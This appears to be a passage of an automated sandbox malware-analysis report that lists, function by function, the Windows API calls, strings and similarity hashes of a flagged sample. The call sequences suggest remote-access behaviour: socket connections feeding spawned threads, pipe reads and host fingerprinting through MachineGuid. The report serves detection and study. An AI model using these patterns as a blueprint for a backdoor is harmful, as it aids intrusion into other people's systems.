                      • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E5964
                      • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E598F
                      • HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E5992
                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E599D
                      • HeapReAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E59A0
                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E59F7
                      • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E5A13
                      • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 005E5A18
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseHandleHeap$PipeProcess$AllocCreateNamedPeek$FileObjectReadSingleWait
                      • String ID: D
                      • API String ID: 2337985897-2746444292
                      • Opcode ID: 82f06362d5392f20fa721e7e1e480e5e811e957e80bf77cd6808b49800a2d660
                      • Instruction ID: 09e12fc73b04d0b3ca66315723ed7658052bd0ee910085cb924709128f447889
                      • Opcode Fuzzy Hash: 82f06362d5392f20fa721e7e1e480e5e811e957e80bf77cd6808b49800a2d660
                      • Instruction Fuzzy Hash: BC51D470A00299AFEB248FA5DC88BEFBFB9FF44315F104465E994E7290E7709804CB60
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: task
                      • String ID: *$7$D$Q$mvfhugfzhjaxvbknnhrjilxlfyzwtcfeenffipnrifprrliuzcjwulczesnckfzhjp$wcgwprfuhsreihulyoxaptokhjbbumrzzfonukijjmhyytfdjnxxratsclpujhtohnz$wgn$zaiptbmxvlxmaeyxfahlfgzodoaaorzwxdwlcbbswmzrxpgsvwdogtygmxrtlyfffezpl
                      • API String ID: 1384045349-950991828
                      • Opcode ID: 773d84aa2788275d19176bba2389daa16b7278f58ce468fc0a032c59c79b95f1
                      • Instruction ID: b9ced6e827b2f30ec9f0154395ef86b8d96bf619c47bff2d0c3b7ba3631a07e7
                      • Opcode Fuzzy Hash: 773d84aa2788275d19176bba2389daa16b7278f58ce468fc0a032c59c79b95f1
                      • Instruction Fuzzy Hash: 6A614670D04258CADB14DFA8CD557EEBBB9BB04304F1081A9E409BB2C2DB759B85FB91
                      APIs
                      • inet_pton.WS2_32(00000002,?,?), ref: 005E7583
                      • htons.WS2_32(?), ref: 005E758E
                      • socket.WS2_32(00000002,00000001,00000006), ref: 005E75A6
                      • connect.WS2_32(00000000,?,00000010), ref: 005E75C4
                      • recv.WS2_32(00000000,?,00000002,00000000), ref: 005E75DC
                      • GetProcessHeap.KERNEL32(00000008,00000024), ref: 005E75FD
                      • HeapAlloc.KERNEL32(00000000), ref: 005E7600
                      • CreateThread.KERNEL32(00000000,00000000,Function_00006410,00000000,00000000,00000000), ref: 005E767B
                      • CloseHandle.KERNEL32(00000000), ref: 005E7686
                      • recv.WS2_32(00000000,?,00000002,00000000), ref: 005E769E
                      • closesocket.WS2_32(00000000), ref: 005E76AD
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 005E76B6
                      • HeapFree.KERNEL32(00000000), ref: 005E76B9
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E76D3
                      • HeapFree.KERNEL32(00000000), ref: 005E76D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$Freerecv$AllocCloseCreateHandleThreadclosesocketconnecthtonsinet_ptonsocket
                      • String ID:
                      • API String ID: 2784442062-0
                      • Opcode ID: 9006c8f48dceb45d7c494fab0d47777123a87492c0795026b4789f98e4dc4c07
                      • Instruction ID: 2135069263c7654b2bf21819227364b6526d3234c346f587e54aa8da5d5fb7aa
                      • Opcode Fuzzy Hash: 9006c8f48dceb45d7c494fab0d47777123a87492c0795026b4789f98e4dc4c07
                      • Instruction Fuzzy Hash: F341F674A047C96AE72C4F7A8C89B6B3F68BF18716F040058FA81DF1D1D7709845D7A4
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: task
                      • String ID: 6$E$Z$d$dsjeagbelkgqcwpmepfckbptdwhhxxjtlspkxngcfukuyvsbhwvhrzguybcubpflwcttrjukrdntfebinbhhiaqsgnumfjvx$xwsxrlmzs
                      • API String ID: 1384045349-1131196702
                      • Opcode ID: db37b4962d10f62e8f0632bbce2ba18717c521d3e0a01c845adfcd6650f21fbd
                      • Instruction ID: 80ae533f7aac93dfcf129ca2dee2124318c88b2d10ac4f2ea9fc20f95b83cdac
                      • Opcode Fuzzy Hash: db37b4962d10f62e8f0632bbce2ba18717c521d3e0a01c845adfcd6650f21fbd
                      • Instruction Fuzzy Hash: 5E514530D0429CCADB10DFA8C9557EDBBB4BF05304F108159D409BB2C2DBB95A89FB61
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: task
                      • String ID: &$+$6$=J$W
                      • API String ID: 1384045349-2096352046
                      • Opcode ID: 879e82b47c1a71ad6cc82be205fbacc476ae8d7f8be29a9c1c62d16ed710df15
                      • Instruction ID: b4f362afe0879aec9ca65da21b7148f9fe674639de65d4786d9bc69f9c6fcad7
                      • Opcode Fuzzy Hash: 879e82b47c1a71ad6cc82be205fbacc476ae8d7f8be29a9c1c62d16ed710df15
                      • Instruction Fuzzy Hash: DB516771D0425CDADB24DFA8D985BEEBBB5BF04304F108159E805BB2C1DB78AA48FB51
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: task
                      • String ID: $$&$)$csbmzcyumqprcesgqvrbiqvieamoc$wsjzsxnfmygsdnpewkoqbnspsl
                      • API String ID: 1384045349-920653587
                      • Opcode ID: 50303d145aacf56d3e4c520505ce1135346e921dd673be4f09f762cf4010ef64
                      • Instruction ID: fc56b7b3ad118ee2f8803dc572f1b34918a49bcb5c053b9a0f78a32ccfdc5115
                      • Opcode Fuzzy Hash: 50303d145aacf56d3e4c520505ce1135346e921dd673be4f09f762cf4010ef64
                      • Instruction Fuzzy Hash: FE515970D0569CCAEB14DFA8C9557EEBBB0BF15304F108259E406BB2C1DB789A89FB41
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: task
                      • String ID: 0`$<$=$M$xubyndzhfgkyolyjftysvciojnmqkiuylaiuaozgbzivnsajwdwckwqlrikkokfgwivcmckrldruifkdvqnugkamweifj
                      • API String ID: 1384045349-2568968963
                      • Opcode ID: b48277ebeaeaadb695b49cd12fad078549f27e4fd7ef55dcd958bdaeed888809
                      • Instruction ID: ffa8728284f9e3c9906fb536920a9986864113720b77ba616081cfa86660849c
                      • Opcode Fuzzy Hash: b48277ebeaeaadb695b49cd12fad078549f27e4fd7ef55dcd958bdaeed888809
                      • Instruction Fuzzy Hash: 44516330D0125CDEDB10CFA8DE51BEEBBB9AB05300F18825AE405BB2C1DB799B45EB51
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID:
                      • String ID: ,$A$\$d$rvqfbzqkzchslsowjgwbgixyqxqahpgvicmrxyzufifpctjqvucgyyeawwbhskxnegbgufnoibeaiqpmwd
                      • API String ID: 0-2569941080
                      • Opcode ID: 244611f0d31581032ab6dce4304c15d5fc88b6f83c0c8c5456a5c8ea6affe573
                      • Instruction ID: 6aec78f7055120eceed0cfa418fc7462bf0fcac8e5c526e2d429ebc5f266cb43
                      • Opcode Fuzzy Hash: 244611f0d31581032ab6dce4304c15d5fc88b6f83c0c8c5456a5c8ea6affe573
                      • Instruction Fuzzy Hash: 1051B871E01259DBEB10CFA8DA85BEEBBB5BF04344F108159E005BB2C1DB789A45FB60
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: task
                      • String ID: 8$D$lkyntrsqz
                      • API String ID: 1384045349-148982923
                      • Opcode ID: df2eea6af198d2119b7c73297aa0f0000d5dca87d3ea432755686a2eea8a2cb5
                      • Instruction ID: 6d0189adcd784d16a6b655a92dc83cc70566205f974f3412b2d2309a62d94d8c
                      • Opcode Fuzzy Hash: df2eea6af198d2119b7c73297aa0f0000d5dca87d3ea432755686a2eea8a2cb5
                      • Instruction Fuzzy Hash: F9512770D04268EADB54EBA8DC85BEDBBB5BF04300F1081A9E505B72C1DB785A49FB61
                      APIs
                      Strings
                      • A, xrefs: 00F03137
                      • ujyqmneftulvwfljvcmwetqvlmaymtityduoubcyyomgaapgyenshgo, xrefs: 00F030E3
                      • ocibpbo, xrefs: 00F030F4
                      • qpbylxwxflfebdrntvmeuqlydjolllbohiwrnuuzrok, xrefs: 00F030D2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: task
                      • String ID: A$ocibpbo$qpbylxwxflfebdrntvmeuqlydjolllbohiwrnuuzrok$ujyqmneftulvwfljvcmwetqvlmaymtityduoubcyyomgaapgyenshgo
                      • API String ID: 1384045349-345111150
                      • Opcode ID: 183cae2572a1c2d8589087f40000aa919dad13cb3c56ceb7429cdefd33608c8f
                      • Instruction ID: de651cdf5316fd6d860a80292834650b55b75a94fe784ca36342d09607a4251f
                      • Opcode Fuzzy Hash: 183cae2572a1c2d8589087f40000aa919dad13cb3c56ceb7429cdefd33608c8f
                      • Instruction Fuzzy Hash: F8316630C1468CCADB05DFA4C9157EDBBB8FB09740F508259E411BB2C1EBB85A45EB40
                      APIs
                      • EnterCriticalSection.KERNEL32(005EA088), ref: 005E6B31
                      • StrCmpNIA.SHLWAPI(?,?,00000000), ref: 005E6B6A
                      • LeaveCriticalSection.KERNEL32(005EA088,00000000), ref: 005E6B86
                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E6BE0
                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E6BE7
                      • LeaveCriticalSection.KERNEL32(005EA088,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E6BFD
                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E6C17
                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E6C1E
                      • LeaveCriticalSection.KERNEL32(005EA088,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E6C2F
                      • GetProcessHeap.KERNEL32(00000008,?,?), ref: 005E6C3B
                      • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005E6C42
                      • LeaveCriticalSection.KERNEL32(005EA088), ref: 005E6C53
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$CriticalSection$Leave$Process$Alloc$EnterFree
                      • String ID:
                      • API String ID: 2132424838-0
                      • Opcode ID: 885d08d916353b368b5912dd7a6a304a1f806ea93335dfc457bbfbcd04633eab
                      • Instruction ID: 91142c0cc3b5669cca93556bd4d4366f54d0fb4cddcb888d4939832d26443a1d
                      • Opcode Fuzzy Hash: 885d08d916353b368b5912dd7a6a304a1f806ea93335dfc457bbfbcd04633eab
                      • Instruction Fuzzy Hash: 2431D4716012C19FE71C9F76AC8CB6B3F65FBB43A2F141068E1D1CA1A0D730A808DB11
                      APIs
                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 005E71CA
                      • RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 005E71E6
                      • GetProcessHeap.KERNEL32(00000008,?), ref: 005E71F9
                      • HeapAlloc.KERNEL32(00000000), ref: 005E7200
                      • RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 005E721D
                      • RegCloseKey.ADVAPI32(80000002), ref: 005E7229
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeapQueryValue$AllocCloseOpenProcess
                      • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                      • API String ID: 2639912721-1211650757
                      • Opcode ID: eb4d00010110b4d65f11fc8ad75258f93102fea1ee44f46c9ff18d8f69ab3eea
                      • Instruction ID: dae25b91e3953ea70fac80e7c9114f5cc0cd7b6e63b2c8b8341b9822067e73c0
                      • Opcode Fuzzy Hash: eb4d00010110b4d65f11fc8ad75258f93102fea1ee44f46c9ff18d8f69ab3eea
                      • Instruction Fuzzy Hash: 2D31D439E08699AAEB398FA6CC84BAFBFB5FF58700F644455EAC1D7250E3709940C650
                      APIs
                      • type_info::operator==.LIBVCRUNTIME ref: 00F0614A
                      • ___TypeMatch.LIBVCRUNTIME ref: 00F06258
                      • _UnwindNestedFrames.LIBCMT ref: 00F063AA
                      • CallUnexpected.LIBVCRUNTIME ref: 00F063C5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                      • String ID: csm$csm$csm
                      • API String ID: 2751267872-393685449
                      • Opcode ID: a8a39477f0fe7d3f2be0489dc2a8cb7eafecd218b0adaf13a9d9af001fcdd355
                      • Instruction ID: cf6de946b04e0f13b63f04b9399adbf5c2058742fe3e5e11173a183ceea89d88
                      • Opcode Fuzzy Hash: a8a39477f0fe7d3f2be0489dc2a8cb7eafecd218b0adaf13a9d9af001fcdd355
                      • Instruction Fuzzy Hash: C8B17871C00219EFDF24DFA4D9819AEBBB5BF14720B14805AE800AB292D774DA61FF91
                      Strings
                      • G, xrefs: 00F02A10
                      • beaemujvpajrvbaezouuzkuenvffkjpbnnirudwjvuzqydvezlarzhdsfxwuhzojaavxqsfrojtvvhymywenjfz, xrefs: 00F029A3
                      • uddhomtrruwqszocsssabgvinoqawnbjjydctdjlooafgswzslbhgzmrkvbotxaekjvxqqzflyruasphbtqjdnqeddrfqqgnzi, xrefs: 00F0297B
                      • asvicjtdhmzqotxvozjkovueuspcnlsoajeseuzmqsvumshplyhddsgzgnwdujkffassuagpxdjjtqpfeyuvjhzapj, xrefs: 00F029B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID:
                      • String ID: G$asvicjtdhmzqotxvozjkovueuspcnlsoajeseuzmqsvumshplyhddsgzgnwdujkffassuagpxdjjtqpfeyuvjhzapj$beaemujvpajrvbaezouuzkuenvffkjpbnnirudwjvuzqydvezlarzhdsfxwuhzojaavxqsfrojtvvhymywenjfz$uddhomtrruwqszocsssabgvinoqawnbjjydctdjlooafgswzslbhgzmrkvbotxaekjvxqqzflyruasphbtqjdnqeddrfqqgnzi
                      • API String ID: 0-2951736196
                      • Opcode ID: 6a88c0c1e5c157cc09a0f583872a69d754f1f5902ba49bfa5c7e512f17d93c03
                      • Instruction ID: 4aca68ec5bd9afea0fd8b9705da8ea381e580d178bd0b93110c659399a572a58
                      • Opcode Fuzzy Hash: 6a88c0c1e5c157cc09a0f583872a69d754f1f5902ba49bfa5c7e512f17d93c03
                      • Instruction Fuzzy Hash: 25315670D1439CCAEB14DFA8C9587EEBBB5BB04314F104219D405BB2C1DBB85A85FB51
                      APIs
                      • InternetCrackUrlW.WININET(005EA10C,00000000,00000000,0000003C), ref: 005E66D5
                      • GetProcessHeap.KERNEL32(00000008,00000001,005EA10C), ref: 005E66F7
                      • HeapAlloc.KERNEL32(00000000), ref: 005E66FA
                      • GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 005E6769
                      • HeapAlloc.KERNEL32(00000000), ref: 005E676C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                      • Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocProcess$CrackInternet
                      • String ID: <
                      • API String ID: 2637570027-4251816714
                      • Opcode ID: 733cff1bffb0e7d240d2ce5c8700343f00775d3c043e8d86198d49a71f1244f4
                      • Instruction ID: b487ac37f63f964c41d7cfcd996ed2803dc27f33dd48fd9ac3618a676a5d7b0a
                      • Opcode Fuzzy Hash: 733cff1bffb0e7d240d2ce5c8700343f00775d3c043e8d86198d49a71f1244f4
                      • Instruction Fuzzy Hash: FF51F374A003868FDB28CF69D484BAEBBF0FF65388F2440ACD495DB652D7719906CB50
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 00F059D7
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00F059DF
                      • _ValidateLocalCookies.LIBCMT ref: 00F05A68
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00F05A93
                      • _ValidateLocalCookies.LIBCMT ref: 00F05AE8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 1170836740-1018135373
                      • Opcode ID: c5829a6dad4458682265749fb52f0171146274fcbac94ba3442978b2ca61932a
                      • Instruction ID: 35e9f064b5b9486c9217063edd4669ec709064178fc4341d3fb22555ea3fb72a
                      • Opcode Fuzzy Hash: c5829a6dad4458682265749fb52f0171146274fcbac94ba3442978b2ca61932a
                      • Instruction Fuzzy Hash: 7741A034F00608EBCF10DF68CC84A9F7BA1AF49724F148155E814AB2D2D7799A55FF90
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID:
                      • String ID: -$E$V$vdxqujrbgdewzmu
                      • API String ID: 0-431869934
                      • Opcode ID: dc851f5e567b3a33d37eb4acd94cac88c2f95f9f2be99df64ad8f880e14f3599
                      • Instruction ID: 76aef42773911855bdc285cd529af2590ae4100355b07400f22eebc208c0330b
                      • Opcode Fuzzy Hash: dc851f5e567b3a33d37eb4acd94cac88c2f95f9f2be99df64ad8f880e14f3599
                      • Instruction Fuzzy Hash: 1C313B75D0524DCBEB44CF98C9487EEBBB1FB45318F20811AD411BA2C0DB799A44FBA1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                      • Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd
                      Similarity
                      • API ID: task
                      • String ID: pavbdksuyfvhipdpzirreavpchekomwlwyogckkwulgrtrdkljtoqeysjlgc$zjhviby
                      • API String ID: 1384045349-3793283277
                      • Opcode ID: 8fcc80a978c3ebe0419313ae79983239fc34f48cd6abd30ee994353d132edb4d
                      • Instruction ID: 4fb7dd7f0d3f8bc617193f0485e7bd074bcbec1166c05f6d2d86ac759ae83afc
                      • Opcode Fuzzy Hash: 8fcc80a978c3ebe0419313ae79983239fc34f48cd6abd30ee994353d132edb4d
                      • Instruction Fuzzy Hash: 82315331C0065CDADB10DFA4C955BEEBBB4BF0A340F208259E415BB2C1EB785A4AEB51
